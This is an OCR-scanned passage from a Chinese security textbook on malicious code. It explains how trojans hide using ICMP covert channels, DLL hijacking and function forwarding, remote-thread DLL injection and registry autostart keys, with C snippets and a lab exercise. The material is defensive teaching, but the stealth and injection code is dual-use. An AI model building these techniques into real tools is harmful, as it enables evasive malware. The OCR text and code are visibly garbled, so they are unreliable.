成 长 的 ,其 中 一 种 ICMP 木马 就 彻底 摆脱 了 端口 的 束缚 ,成 为 黑客 人 侵 后 门 工具 中 的 佼 
佼 者 。 

ICMP 的 全 称 是 Internet Control Message Protocol( 因 特 网 控制 报 文 协议 ) , 它 是 IP 协 
议 的 附属 协议 ,用 来 传递 差错 报 文 以 及 其 他 需要 注意 的 消息 报 文 ,这 个 协议 常常 为 TCP 或 
UDP 协议 服务 ,但 是 也 可 以 单独 使 用 ,例如 著名 的 工具 ping 就 是 通过 发 送 接收 ICMP_ 
ECHO 和 ICMP_ECHOREPLY 报 文 来 进行 网 络 诊断 的 。 

实际 上 ,ICMP 木马 的 出 现 正 是 得 到 了 ping 程序 的 启发 ,由 于 ICMP 报 文 是 由 系统 内 
核 或 进程 直接 处 理 而 不 是 通过 端口 ,这 就 给 木马 一 个 摆脱 端口 的 绝 好 机 会 ,木马 将 自己 伪装 
成 一 个 ping 的 进程 ,系统 就 会 将 ICMP_ECHOREPLY (Ping 的 回 包 ) 的 监听 、 处理 权 交 给 森 
马 进 程 ,一旦 事先 约定 好 的 ICMP_ECHOREPLY 包 出 现 ( 可 以 判断 包 大 小 .ICMP_SEQ 等 
特征 ) ,木马 就 会 接受 分析 并 从 报 文中 解码 出 命令 和 数据 。 

ICMP_ECHOREPLY 包 还 有 对 于 防火 墙 和 网 关 的 穿 透 能 力 。 对 于 防火 墙 来 说 ,ICMP 
报 文 被 列 为 危险 的 一 类 。 从 Ping of Death 到 ICMP 风暴 再 到 ICMP 碎片 攻击 ,构造 ICMP 
报 文 一 向 是 攻击 主机 的 最 好 方法 之 一 ,因此 一 般 的 防火 墙 都 会 对 ICMP 报 文 进行 过 滤 。 但 
是 ICMP_ECHOREPLY 报 文 却 往往 不 会 在 过 滤 策 略 中 出 现 , 这 是 因为 一 旦 不 允许 ICMP_ 
ECHOREPLY 报 文通 过 就 意味 着 主机 没有 办 法 对 外 进行 ping 的 操作 ,这 样 对 于 用 户 是 极 
其 不 友好 的 。 如 果 设 置 正确 ,ICMP_ECHOREPLY 报 文 也 能 穿 过 网 关 , 进 入 局 域 网 。 

为 了 实现 发 送 /监听 ICMP 报 文 , 必 须 建立 SOCK_RAW( 原 始 套 接 口 )。 首 先 ,需要 定 
义 一 个 IP 头 部 和 一 个 ICMP 头 部 结构 。 

typedef struct iphdr { 
unsigned int version:4; // IP 版 本 号 ,4 表示 IPV4 


unsigned int h len:4; // 4 位 首部 长 度 
unsigned char tos; // 8 位 服务 类 型 TOS 
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unsigned short total len; 
unsigned short ident; 

unsigned short frag and flags; 
unsigned char tt]; 

unsigned char proto; 


// 16 位 总 长 度 ( 字 节 ) 

//16 位 标识 

// 3 位 标志 位 

//8 位 生存 时 间 TIL 

// 8 位 协议 (TCP、UDP 或 其 他 ) 


unsigned short checksum; // 16 位 IP 首部 校 验 和 
unsigned int sourceIP; //32 位 源 IP 地 址 
unsigned int destIP; //32 位 目的 IP 地址 
}IpHeader; 
typedef struct ihdr { 
BYTE i type; //8 位 类 型 
BYTE i code; //8 位 代码 
USHORT i cksum; //16 位 校 验 和 
USHORT i id; // 识 别 号 (一 般 用 进程 号 作为 识别 号 ) 
USHORT 1 seq; // 报 文 序列 号 
ULONG timestamp; // 时 间 戳 
}IcmpHeader ; 
这 时 可 以 通过 WSASocket 建立 一 个 原始 套 接 口 
SockRaw = WSRSocket( RE INET， // 协 议 族 
SOCK_RAW, // 协 议 类 型 , SOCK_RAW 表示 是 原始 套 接口 
IPPROTO_ICMP, // 协 议 , IPPROTO_ICMP 表示 ICMP 数据 报 
NULL, //WSAPROTOCOL _ INFO 置 空 
0, // 保 留 字 ,永远 置 为 0 


WSA_FLAG OVERLAPPED 


// 为 了 使 用 发 送 接收 超时 设置 (设置 50_RCVTIMEO, 


// SO_SNDTIME0) , 必须 将 标志 位 置 为 WSA_FLAG OVERLAPPED. 


随后 可 以 使 用 fill icmp_data 子 程序 填充 ICMP 报 文 段 。 


void fill icmp data(char * icmp data, int datasize) 


IcmpHeader * icmp_hdr; 

char * datapart; 

icmp_hdr = (IcmpHeader * )icmp data; 
icmp hdr 一 > 1 type = ICMP ECHOREPLY; 
icmp hdr ->i code = 0; 


icmp hdr ~->i id = (USHORT)GetCurrentProcessId( ) ; 


icmp hdr 一 >1 cksum = 0; 
icmp hdr —>i seq = 0; 


// 类 型 为 ICMP ECHOREPLY 


// 识 别 号 为 进程 号 
// 校 验 和 初始 化 
// 序 列 号 初始 化 


datapart = icmp data + sizeof(IcmpHeader); 


// 数 据 端 的 地 址 为 icmp 报 文 地 址 加 上 ICMP 的 首部 长 度 


memset(datapart, "A", datasize - sizeof(IcmpHeader)); // 这 里 填充 的 数据 全 部 为 "A", 读 者 可 
// 以 填充 任何 代码 和 数据 ,实际 上 木马 和 控制 端 之 间 就 是 通过 数据 段 传递 数据 的 


} 


接着 ,再 使 用 CheckSum 子 程序 计算 ICMP 校 验 和 。 
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((IcmpHeader * )icmp data) -> i cksum 
= checksum( (USHORT * )icmp data, datasize); 
USHORT CheckSum (USHORT * buffer, int size) 
{ 
unsigned long cksum = 0; 
while(size >1) 
{ 
cksum += x buffer++ ; 
size —= sizeof (USHORT); 
} 
if(size ) cksum +=*x (UCHAR * )buffer; 
cksum= (cksum >> 16) + (cksum & Oxffff); 
cksum += (cksum >> 16); 
return (USHORT) (一 cksum) ; 
} // CheckSum 函数 是 标准 的 校 验 和 函数 ,也 可 以 用 优化 过 的 任何 校 验 和 函数 来 代替 它 


随后 ,就 可 以 通过 sendto 困 数 发 送 ICMP _ ECHOREPLY 报 文 。 


sendto( sockRaw, icmp data, datasize,0, (struct sockaddr * )&dest, sizeof(dest) ) ; 


作为 服务 端的 监听 程序 ,基本 的 操作 相同 ,只 是 需要 使 用 recvfrm 函数 接收 ICMP_ 
ECHOREPLY 报 文 并 用 decoder 函数 将 接收 来 的 报 文 解码 为 数据 和 命令 。 


recv_ icmp = recvfrom( sockRaw, recvbuf, MAX PACKET,0, (struct 
sockaddr * )&from, &fromlen); 
decode resp(recvbuf, recv_icmp, &from) ; 


decoder 困 数 ; 


void decoder(char * buf, int bytes, struct sockaddr in * from) 
{ 

IpHeader * iphdr; 

IcmpHeader * icmphdr; 

unsigned short iphdrlen; 


iphdr = (IpHeader * )buf; //IP 首部 的 地 址 就 等 于 buf 的 地 址 

iphdrlen = iphdr ->h len x 4; // 因为 h len 是 32 位 Word, 要 转换 成 bytes 必须 乘 以 4 
icmphdr = (IcmpHeader * )(buf + iphdrlen); //ICMP 首部 的 地 址 等 于 IP 首部 长 度 加 buf 
printf(" %d bytes from % s:",bytes, inet ntoa(from—> sin addr)); // 取 出 源 地 址 
printf(" icmp id= %d. ",icmphdr ->i id); // 取 出 进程 号 
printf(" icmp seq= %d. ",icmphdr 一 > 1 seq); // 取 出 序列 号 
printf(" icmp type= %d",icmphdr ->1i type); // 取 出 类 型 
printf(" icmp code= % d",icmphdr -> i code); // 取 出 代码 


for(i=0;i< ICMP DATA SIZE;I++) printf("%c", x (buf + iphdrlen+i+12)); // 取 出 数据 段 
} 


对 于 ICMP 木马 ,除非 使 用 嗅 探 器 或 者 监视 Windows 的 SockAPI 调用 ,和 否则 ,很 难 发 
现 木 马 的 行踪 。 如 果 想 阻止 ICMP 木马 ,就 必须 过 滤 ICMP 报 文 ,对 于 Windows 2000 可 以 
使 用 系统 自 带 的 路 由 功能 对 ICMP 协议 进行 过 滤 。Windows 2000 的 Routing & Remote 


148 计算 机 病毒 与 恶意 代码 一 一 原理 、 技 术 及 防范 (第 4 版 ) 


Access 功能 十 分 强大 ,其 中 之 一 就 是 建立 一 个 TCP/IP 协议 过 滤器 。 不 过 值得 注意 的 是 ， 
一 旦 在 输入 过 滤器 中 禁止 了 ICMP_ECHOREPLY 报 文 ,就 无 法 再 用 Ping 这 个 工具 了 。 如 
果 过 滤 了 所 有 的 ICMP 报 文 ,就 收 不 到 任何 错误 报 文 , 当 使 用 IE 访问 一 个 并 不 存在 的 网 站 
时 ,往往 要 花 数 倍 的 时 间 才 能 知道 结果 ,而 且 基 于 ICMP 协议 的 tracert 工具 也 会 失效 ,这 也 
是 方便 和 安全 之 间 的 矛盾 的 统一 。 

3. 隐藏 端口 

端口 是 木马 最 大 的 漏洞 ,经 过 不 断 宣传 ,现在 连 一 个 刚刚 上 网 没有 多 入 的 新 手 也 知道 用 
NETSTAT 查看 端口 。 放 弃 了 端口 后 木马 怎么 和 控制 端 联络 呢 ? 对 于 这 个 问题 ,不 同 的 森 
马 采 用 了 不 同 的 方法 ,大致 分 为 寄生 和 潜伏 。 

寄生 就 是 找 一 个 已 经 打开 的 端口 寄生 其 上 ,平时 只 是 监听 , 遇 到 特殊 的 指令 就 解释 执 
行 。 因 为 木马 实际 上 是 寄生 在 已 有 的 系统 服务 之 上 的 ,因此 ,在 扫描 或 查看 系统 端口 的 时 候 
是 没有 任何 异常 的 。 据 作者 所 知 , 在 Windows 98 下 进行 这 样 的 操作 是 比较 简单 的 ,但 是 对 
于 Windows 2000 要 麻烦 得 多 。 感 兴趣 的 读者 可 以 进一步 猎 究 。 

潜伏 是 使 用 IP 协议 族 中 的 其 他 协议 而 不 是 TCP 或 UDP 来 进行 通信 ,从 而 瞒 过 
Netstat 和 端口 扫描 软件 。 一 种 比较 常见 的 潜伏 手段 是 使 用 ICMP 协议 。 

除了 寄生 和 潜伏 之 外 ,木马 还 有 其 他 更 好 的 方法 进行 端口 隐藏 ,比如 直接 针对 网 卡 或 
Modem 进行 底层 的 编程 ,这 涉及 更 高 的 编程 技巧 。 

4. Windwos NT 系统 下 木马 进程 的 隐藏 

在 Windows 9x 中 ,只 需要 将 进程 注册 为 系统 服务 就 能 够 从 进程 查看 硕 中 隐形 ,可 是 这 
一 切 在 Windows NT 中 却 完全 不 同 ,无 论 木 马 从 端口 .启动 文件 上 如 何 巧 妙 地 隐藏 自己 , 始 
终 都 不 能 其 Windows NT 的 任务 管理 需 ,难道 在 Windows NT 下 木马 真 的 再 也 无 法 隐 茂 
日 己 的 进程 了 ? 

在 Windows 系统 下 ,可 执行 文件 主要 是 EXE 和 COM 文件 ,这 两 种 文件 在 运行 时 都 有 
一 个 共同 点 : 会 生成 一 个 独立 的 进程 。 寻 找 特定 进程 是 发 现 木马 的 方法 之 一 (无 论 手动 还 
是 防火 墙 ), 随 着 入 侵 检 测 软件 的 不 断 发 展 ,关联 进程 和 SOCKET 已 经 成 为 流行 的 技术 (如 
著名 的 FPort 就 能 够 检测 出 任何 进程 打开 的 TCP/UDP 端口 ) ,假设 一 个 木马 在 运行 时 被 检 
测 软 件 同时 查 出 端口 和 进程 ,基本 上 认为 这 个 木马 的 隐藏 已 经 完全 失败 (利用 心理 因素 而 非 
技术 手段 欺骗 用 户 的 木马 不 在 此 讨论 范围 之 内 )。 正 常情 况 下 ,Windows NT 用 户 进 程 对 于 
系统 管理 员 来 说 都 是 可 见 的 ,要 想 做 到 木马 的 进程 隐藏 ,有 两 个 思路 : 第 一 个 是 让 系统 管理 
员 看 不 见 ( 或 者 视而不见 ) 进 程 ; 第 二 个 是 不 使 用 进程 。 

让 系统 管理 员 看 不 见 进程 的 方法 就 是 进行 进程 列表 欺骗。 为 了 了 解 如 何 看 不 见 进程 ， 
首先 要 了 人 解 怎样 能 看 得 见 进程 。 在 Windows 中 有 多 种 方法 能 够 看 到 进程 的 存在 。 例 如 PS 
APICProcess Status API) .PDH(Performance Data Helper) 和 ToolHelp API。 如 果 能 够 其 
骗 用 户 和 入 侵 检 测 软 件 来 查看 进程 的 函数 (如 截获 相应 的 API 调用 ,替换 返回 的 数据 ) ,就 
完全 能 实现 进程 隐藏 。 但 是 首先 并 不 知道 用 户 和 入 侵 检 测 软 件 使 用 的 是 什么 方法 来 查看 进 
程 列表 ,其 次 如 果 有 权限 和 技术 实现 这 样 的 欺骗 ,就 一 定 能 使 用 其 他 方法 更 容易 地 实现 进程 
的 隐藏 。 

第 二 种 方法 是 不 使 用 进程 。 不 使 用 进程 使 用 什么 ? 为 了 和 弄 明 白 这 个 问题 ,必须 要 先 了 
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解 Windows 系统 的 另 一 种 可 执行 文件 DLL。DLL 是 Dynamic Link Library( 动 态 链接 库 ) 
的 缩写 , 它 是 Windows 的 基础 ,因为 所 有 的 API 函数 都 是 在 DLL 中 实现 的 。DLL 文件 没 
有 程序 逻辑 ,由 多 个 功能 函数 构成 , 它 并 不 能 独立 运行 ,一 般 都 是 由 进程 加 载 并 调用 的 。 因 
为 DLL 文件 不 能 独立 运行 ,所 以 在 进程 列表 中 并 不 会 出 现 DLL。 假设 编写 了 一 个 木马 
DLL, 并 且 通 过 别 的 进程 来 运行 它 , 那 么 无 论 是 入 侵 检 测 软 件 还 是 在 进程 列表 中 ,都 只 会 出 
现 那 个 进程 而 并 不 会 出 现 木 马 DLL ,如果 那 个 进程 是 可 信 进 程 (如 资源 管理 帮 Explorer. 
exe, 没 人 会 怀疑 它 是 木马 吧 ) ,那么 我 们 编写 的 DLL 作为 进程 的 一 部 分 ,也 将 成 为 被 信赖 的 
一 员 而 为 所 和 欲 为 。 在 木马 中 ,有 3 种 使 用 DLL 的 方式 。 

1) 最 简单 的 方式 

运行 DLL 文件 最 侧 单 的 方法 是 利用 Rundll. exe/Rundll32. exe。 Rundll/Rundll32 是 
Windows 自 带 的 动态 链接 库 工具 ,可 以 用 来 在 命令 行 下 执行 动态 链接 库 中 的 某 个 函数 ,其 
中 Rundll 是 16 位 而 Rundll32 是 32 位 的 (分 别 调用 16 位 和 32 位 的 DLL 文件 )。Rundll32 
的 使 用 方法 如 下 。 


Rundll132 DllFileName FuncName 


如 采编 写 了 一 个 MyDll. dll, 这 个 动态 链接 库 中 定义 了 一 个 MyFunc 的 函数 ,那么 通过 
下 列 命 令 就 可 以 执行 MyFunc 函数 的 功能 。 


Rundl1132. exe MYD11. dll MyFunc 


假设 在 MyFunc 也 数 中 实现 了 木马 的 功能 ,那么 就 可 以 通过 Rundll132 来 运行 这 个 木马 
了 。 在 系统 管理 员 看 来 ,进程 列表 中 增加 的 是 Rundll32. exe 而 并 不 是 木马 文件 ,这 样 也 算 
是 木马 的 一 种 售 易 欺 骗 和 自我 保护 方法 (至 少 不 能 把 Rundll32. exe 删 掉 , 想 从 Rundll32 进 
程 找到 DLL 木马 还 是 有 一 点 腑 烦 的 )。 

2) 比较 高 级 的 方式 

这 种 方法 的 本 质 思想 是 使 用 假 的 DLL( 即 欺骗 DLL) 来 代替 原来 的 DLL 文件 。 由 于 应 
用 程序 在 寻找 DLL 时 会 根据 特定 规则 在 不 同 目录 下 按 序 寻 找 , 这 就 给 欺骗 DLL 提供 了 
可 能 。 

欺骗 DLL 的 工作 原理 为 : 当 应 用 程序 需要 访问 正常 DLL 的 某 个 函数 时 ,其 实 是 访问 
了 欺骗 DLL 的 同名 函数 。 因 此 , 当 欺 骗 DLL 被 访问 时 , 它 将 通过 函数 转发 器 将 正常 的 调用 
转发 给 原 DLL, 而 截获 并 处 理 和 木马 相关 的 特定 消息 。 例 如 ,大 家 知道 Windows 的 
Socketl. x 的 函数 都 是 存放 在 wsock32. dll 中 的 ,那么 目 己 写 一 个 wsock32. dll 文件 奉 换 抒 
原先 的 wsock32. dll (将 原先 的 DLL 文件 重 命 名 为 wsockold. dll)。 用 来 欺骗 用 户 的 
wsock32. dll 只 做 两 件 事 : 一 是 如 果 遇 到 常规 调用 ,就 直接 转发 给 wsockold. dll( 使 用 晒 数 
转发 器 forward) ; 二 是 遇 到 特殊 的 请 求 (事先 约定 的 ) 就 解码 并 处 理 。 这 样 理论 上 只 要 木马 
编写 者 通过 SOCKET 远程 输入 一 定 的 暗号 ,就 可 以 控制 wsock32. dll( 木 马 DLL) 做 任何 操 
作 。 欺 骗 DLL 技术 也 是 比较 老 的 技术 ,因此 微软 也 对 此 做 了 相当 多 的 防范 ,在 Windows 的 
system32 目录 下 有 一 个 dllcache 的 目录 ,这 个 目录 中 存放 着 大 量 的 DLL 文件 和 一 些 重要 的 
EXE 文件 ,这 是 微软 用 来 保护 DLL 的 法 宝 ,一旦 操作 系统 发 现 被 保护 的 DLL 文件 被 算 改 ， 
它 就 会 自动 从 dllcache 中 恢复 这 个 文件 。 虽 然 说 有 种 种 方法 可 以 绕 过 DLL 保护 (例如 , 先 
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更 改 dllcache 目录 中 的 备份 再 修改 DLL 文件 ,或 者 利用 KnownDLLs 键 值 更 改 DLL 的 默 
认 启 动 路 径 等 ) ,但 是 未 来 微软 必 将 on 护 重 要 的 DLL 文件 。 同 时 由 于 欺骗 DLL 
方法 本 身 有 着 一 些 漏洞 (例如 ,修复 安 闻 、 安 玫 补丁 .升级 系统 和 检查 数字 签名 等 方法 都 有 可 
能 导致 特洛伊 DLL 失效 )， et 老 算 是 DLL 木马 的 最 优选 择 。 

(1) 图 数 转发 硕 。 图 数 转 发 希 (Forward) 的 主要 应 用 在 动态 链接 库 中 ,目的 是 实现 函数 
的 转发 。 当 需要 实现 的 图 数 已 经 在 其 他 动态 链接 库 中 实现 过 时 ,就 不 必 册 在 当前 动态 链接 
库 实现 一 过 了 ,而 是 通过 Forward 功能 直接 使 用 另 一 个 库 中 的 困 数 就 可 以 了 。 在 Windows 
目 市 的 核心 动态 链接 库 中 ,有 很 多 转发 现象 。 

输入 如 下 命令 。 


Visual Studio 7 命令 提示 符 > 
dumpBin — Exports c:\windows\system32\Kernel32.dll | more 


县 1 ey 了 结果 如 图 5-5 所 示 。 可 以 看 到 kernel32. dll 中 的 I AcquireSRWLockExclusive 
就 是 一 转发 限 数 。 但 用 户 应 用 程 友 调 用 kernel32. dll 中 的 这 个 果 数 ,实际 上 是 调用 了 NTDLL 
dll 中 的 nile 可 见 该 阴 数 的 具体 实现 是 在 NTDLL. dll 文件 中 。 
EYisual Studio 2008 命令 提示 强 =|s| x| 


1364 numbher of functions 
1364 numbher of names 


ordinal hint RUA name 


3 a fcquireSRWLockExclusive 《forwarded to NIDLL .Rt]lAcquire 
RYWLockExc lus ive> 

4 1 AcoqauireSRWLockShared forwarded to NIDLL.Rt1AcaquireSRY 
ockSshared> 


5 HBH453AD PhctiuatehctCtXx 
6 A003737D fddftomf 

了 0g9ad42EDD fddftomt 
8 


00096B6bo4 fddCGConsolefliashf 
9 DB6g9nhnB593n6 ddConsolef lias! 
1 AddDpllDirectory forwarded to api—ms—win—core—libraryl 
ader—11-1-@.AddDpllDirectory> 
HH08FFOG fddlntegrityLabellToBoundarvyDescriptor 
9 B8086783 fddLocalflternateComputerNamef 
HB@086698 fddLocalflternateComputerName!l 
B03C60F AddReffctCtx 
Do069366B9 fddsIiDToBoundarvyDescriptor 
Han8D1i90 fddSecureMemoruyuCacheCallback 
fddUectoredContinueHandler 《forwarded to NTIDLL.Rt]1Addavy 
ctoredContinueHandler> 
18 F AddUVectoredExceptionHandler 《forwarded to NIDLL.Rt]1Add 
ectoredExceptionHandler> 
一 More -- 


图 5-5 ” Windows 7 系统 DLL 的 转发 现象 


(2) 在 程序 中 实现 函数 转发 。 如 果 写 日 己 的 动态 链接 库 程序 时 需要 引用 第 三 方 动态 链 
接 库 中 的 因数 ,也 可 以 使 用 转发 图 数 。 具 体 的 实现 代码 如 下 。 


# pragma comment (linker, "/export:ForwardFunc = Kernel32. HeapCreate") 


这 句 代 码 的 意思 就 是 在 日 已 的 动态 链接 库 中 导出 了 一 个 名 称 为 ForwardFunc 的 困 数 ， 
但 这 个 函数 在 源 代码 中 没有 有 Po a kernel32. dll 中 。 上 述 语句 的 实现 效 
果 如 图 5-6 所 示 。 图 中 倒数 第 2 行 就 是 转发 情况 的 显示 。 
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:\Program Files Microsoft Uisual Studio 9.8\YC>dumpBin -Exports E:Nquangpanoth 
ercode\testdll\Debug\testdll.dll 

icrosoft <R> COFF/PE Dumper Uersion ?9 .00.21022 .08 

opyright GCG> Microsoft Corporation. fll rights reserved. 


Dump of file E:\guangpan\othercode\testdll\Pebug\testdll.dll 


File Type: DLL 
Section contains the following exports for testdll.dl1l 


日 日 日 日 日 晶 00 characteristics 
d47102PFBb time date stamp Sat Oct 13 1090:38:46 20997 
日 .90 version 
1 ordinal base 
2 numbek of functions 
2 numbher of names 


ordinal hint RUA name 


a ForwardFunc 《forwarded to kKernel132.HeapCreate» 
1 0900010096 display = @ILI+5¢_displavy> 


5-6 ” Forward 函数 的 实现 


3) 最 高 级 的 方式 
DLL 木马 的 最 高 境界 是 动态 舱 入 技术 ,动态 舱 入 技术 指 的 是 将 目 己 的 代码 艇 入 正在 运 
行 的 进程 中 的 技术 。 理 论 上 来 说 ,在 Windows 中 的 每 个 进程 都 有 目 己 的 私有 内 存 空间 , 别 
的 进程 是 不 允许 对 这 个 私有 空间 进行 操作 的 ,但 是 实际 上 ,仍然 可 以 利用 多 种 方法 进入 并 操 
作 进 程 的 私有 内 存 。 在 多 种 动态 艇 入 技术 中 (窗口 Hook、 挂 接 API、 远 程 线程 )， 税 受 欢迎 
的 是 远程 线程 技术 ,这 种 技术 非常 售 单 ,只 要 向 握 基本 的 进程 线程 和 动态 链接 库 的 知识 就 
可 以 很 轻松 地 完成 骨 入 。 下 面 就 为 大 家 介绍 一 下 远程 线程 技术 。 
远程 线程 技术 
远程 线程 技术 指 的 是 通过 在 男 一 个 进程 中 创建 远程 线程 的 方法 进入 那个 进程 的 内 存 地 
址 空间 。 在 进程 中 ,可 以 通过 CreateThread 铺 数 创建 线程 ,被 创建 的 新 线程 与 主线 程 (就 是 
进程 启动 时 被 同时 自动 建立 的 那个 线程 ) 共 享 地 址 空间 以 及 其 他 的 资源 。 但 是 很 少 有 人 知 
道 ,通过 CreateRemoteThread 也 同样 可 以 在 另 一 个 进程 内 创建 新 线程 ,新 线程 同样 可 以 共 
享 远程 进程 的 地 址 空间 ,所 以 通过 一 个 远程 线程 进入 远程 进程 的 内 存 地 址 空间 ,也 就 拥有 了 
有 人 1 六 远程 进程 相同 的 权限 。 例 如 ,在 远程 进程 内 部 局 动 一 个 DLL 木马 (与 进入 进程 内 部 相 
比 , 启 动 一 个 DLL 木马 相当 容易 ,实际 上 可 以 随意 算 改 那个 远程 进程 的 数据 )。 
自 先 ， PE 来 打开 试图 散 入 的 进程 (如 果 远 程 进 程 不 允许 打开 ,那么 艇 入 就 无 
法 进行 了 ,这 往往 是 由 于 权限 不 足 引 起 的 ,解决 方法 是 通过 种 种 途径 提升 本 地 进程 的 权限 )。 


hRemoteProcess = OpenProcess(PROCESS CREATE THREAD | // 人 允许 远程 创建 线程 
PROCESS VM OPERATION | // 人 允许 远程 VM 操作 
PROCESS VM WRITE， // 人 允许 远程 VM 写 


FALSE, dwRemoteProcessId ) 


由 于 后 面 需 要 写 入 远程 进程 的 内 存 地 址 空间 并 建立 远程 线程 ,因此 还 需要 申请 足够 的 
权限 (PROCESS CREATE THREAD.VM OPERATION.VM _ WRITE) 。 

然后 ,可 以 建立 LoadLibraryW 呐 数 这 个 线程 来 启动 DLL 木马 。LoadLibraryW 员 数 
是 在 Kernel32. dll 中 定义 的 ,用 来 加 载 DLL 文件 , 它 只 有 一 个 参数 。 这 个 参数 就 是 DLL 文 
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件 的 绝对 路 径 名 pszLibFileName( 也 就 是 木马 DLL 的 全 路 径 文件 名 ) ,但 是 由 于 木马 DLL 
是 在 远程 进程 内 调用 的 ,因此 还 需要 首先 将 这 个 文件 名 复制 到 远程 地 址 空间 (否则 远程 线程 
是 无 法 读 到 这 个 参数 的 )。 


// 计 算 DLL 路 径 名 需要 的 内 存 空间 
int cb= (1 + lstrlenW(pszLibFileName)) x sizeof(WCHAR); 
// 使 用 VirtualAllocEx 函数 在 远程 进程 的 内 存 地 址 空间 分 配 DLL 文件 名 缓冲 区 
pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb, 
MEM COMMIT, PAGE READWRITE); 
// 使 用 WriteProcessMemory 函数 将 DLL 的 路 径 名 复制 到 远程 进程 的 内 存 空间 
iReturnCode = WriteProcessMemory( hRemoteProcess, 
pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL); 
// 计 算 LoadLibraryW 的 入 口 地 址 
PTHREAD START ROUTINE pfnStartAddr = (PTHREAD START ROUTINE) 
GetProcAddress(GetModuleHandle( TEXT("Kernel32")), "LoadLibraryW" ); 


通过 建立 远程 线程 时 的 地 址 pfnStartAddr( 实 际 上 就 是 LoadLibraryW 的 入 口 地 址 ) 和 
传递 的 参数 pszLibFileRemote( 实 际 上 是 复制 过 去 的 木马 DLL 的 全 路 径 文件 名 ) 在 远程 进 
程 内 启动 木马 DLL 。 


// 启 动 远 程 线程 LoadLibraryW, 通过 远程 线程 调用 用 户 的 DLL 文件 
hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, 
pfnStartAddr, pszLibFileRemote, 0, NULL); 


至 此 ,远程 角 入 顺利 完成 ,为 了 试验 DLL 是 不 是 已 经 正常 在 远程 线程 运行 , 特 编 写 了 以 
下 的 测试 DLL。 


BOOL APIENTRY DllMain( HANDLE hModule, DWORD reason, LPVOID lpReserved) 
{ 
char szProcessId[64] ; 
switch ( reason ) 
{ 
case DLL PROCESS ATTACH: 
{ 
// 获 取 当 前 进程 ID 
_itoa ( GetCurrentProcessId( ) szProcessId, 10 ) ; 
MessageBox ( NULL, szProcessId, "RemoteDLL", MB OK ) ; 
} 
default: 
return TRUE; 
} 
} 


当 使 用 程序 将 这 个 TestDLL. dll 通信 Explorer. exe 进程 后 (PID 二 1208), 该 测试 DLL 
弹出 了 1208 字样 的 确认 框 ,同时 使 用 PS 工具 也 能 看 到 。 


Process ID: 1208 
C: Ws exe (0x00400000) 


G: cnestntr dll (0x100000000) 
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这 证 明 TestDLL. dll 已 经 在 Explorer. exe 进程 内 正确 地 运行 了 。 
无 论 是 使 用 特洛伊 DLL 还 是 使 用 远程 线程 ,都 是 让 木马 的 核心 代码 运行 于 男 外 一 个 进 
程 的 内 存 空间 ,这 样 不 仅 能 很 好 地 隐藏 自己 ,也 能 更 好 地 保护 自己 。 


5.3.4 远程 线程 插入 实验 


【实验 目的 】 
掌握 远程 线程 插入 的 基本 原理 。 
【实验 环境 】 


(1) Windows 32 位 操作 系统 。 

(2) Visual Studio 6. 0 编译 环境 。 

【实验 步骤 】 

(1) 资源 获取 。 从 网 上 下 载 文件 中 复制 实验 文件 到 实验 的 计算 机 上 (源码 位 置 : 本 书 
配套 素材 目录 \Experiment\thread\ImgWalk; 本 书 配 套 素 材 目 录 \Experiment\threadA\ 
InjLib ) 。 

(2) 资源 说 明 。ImgWalk 实现 了 一 个 动态 链接 库 ,这 个 动态 链接 库 就 是 我 们 准备 插入 
其 他 进程 空间 中 的 dll。 它 的 功能 是 罗列 出 被 插入 进程 的 进程 空间 中 站 载 了 哪些 核心 dll 及 
模块 。 

InjLib 是 一 个 可 执行 程序 ,该 程序 负责 把 ImgWalk. dll 插入 第 三 方 进程 空间 中 。 于 是 ， 
ImgWalk. dll 便 在 第 三 方 进程 空间 中 执行 了 ,并 依据 ImgWalk. dll 的 功能 列 出 了 第 三 方 进 
程 加 载 的 核心 模块 。 

(3) 编译 ImgWalk 工程 。 

(4) 编译 InjLib 工程 。 

(5) 打开 第 三 方 进程 。 本 例 中 打开 了 了 正 浏 览 需 ,查找 到 其 PID 为 xxx。 

(6) 用 InjLib. exe 把 ImgWalk. dll 插 入 IE 中 。 

【实验 注意 事项 】 

程序 的 设计 思路 参考 附 书 PPT。 


5.3.5 其 他 技术 


1. Socket 技术 

计算 机 通信 的 基石 是 套 接 字 ,一 个 套 接 字 端口 是 通信 的 一 端 。 在 这 一 关上 可 以 找到 与 
其 对 应 的 一 个 名 称 。 一 个 正在 被 使 用 的 套 接 字 都 有 它 的 类 型 和 与 其 相关 的 进程 。 套 接 字 存 
在 于 通信 域 中 ,通信 域 是 为 了 处 理 一 般 的 线程 通过 套 接 字 通 信和 而 引进 的 一 种 抽象 概念 。 套 
接 字 通常 和 同一 个 域 中 的 套 接 字 交换 数据 (数据 交换 也 可 能 穿越 域 的 界限 ,但 这 时 一 定 要 执 
行 某 种 解释 程序 ) 。Windows Sockets 规范 文 持 单一 的 通信 域 , 即 Internet 域 。 使 用 这 个 域 
的 各 种 进程 互相 之 间 用 Internet 协议 来 进行 通信 (Windows Sockets 1.1 以 上 的 版 本 文 持 其 
他 的 域 ) 。 

2. 修改 注册 表 

经 凋 研 究 注 册 表 的 谈 者 一 定 知 道 ,在 注册 表 中 是 可 以 设置 一 些 局 动 加 载 项 目的 ,编制 木 


154 计算 机 病毒 与 恶意 代码 一 一 原理 ,技术 及 防范 (第 4 版 ) 


马 程序 的 高 手 们 当然 不 会 放 过 这 样 的 机 会 ,况且 他 们 知道 修改 注册 表 会 更 安全 ,因为 会 查看 
并 有 旦 编辑 注册 表 的 人 很 少 。 事实 上 ，Run、 RunOnce、RunOnceEx、RunServices 以 及 
RunServicesOnce 等 都 可 能 是 木马 程序 加 载 的 入 口 。 

为 了 使 操作 系统 运行 得 更 为 稳定 ,微软 在 Windows 95 及 其 后 继 版 本 中 ,推出 了 一 种 称 
为 “注册 表 ” 的 数据 库 , 将 设备 及 应 用 程序 的 信息 资源 与 配置 信息 进行 集中 管理 。 注 册 表 包 
括 以 下 几 个 根 键 。 

(1) HKEY_CLASSES_ROOT: 此 处 存储 的 信息 可 以 确保 当 使 用 Windows 资源 管理 
名 打开 文件 时 ,将 使 用 正确 的 应 用 程序 打开 对 应 的 文件 类 型 。 

(2) HKEY_CURRENT_USER: 存放 当前 登录 用 户 的 有 关 信 息 。 用 户 文 件 夹 .屏幕 颜 
色 和 “控制 面板 ”设置 都 存储 在 此 处 。 该 信息 称 为 用 户 配 置 文件 。 

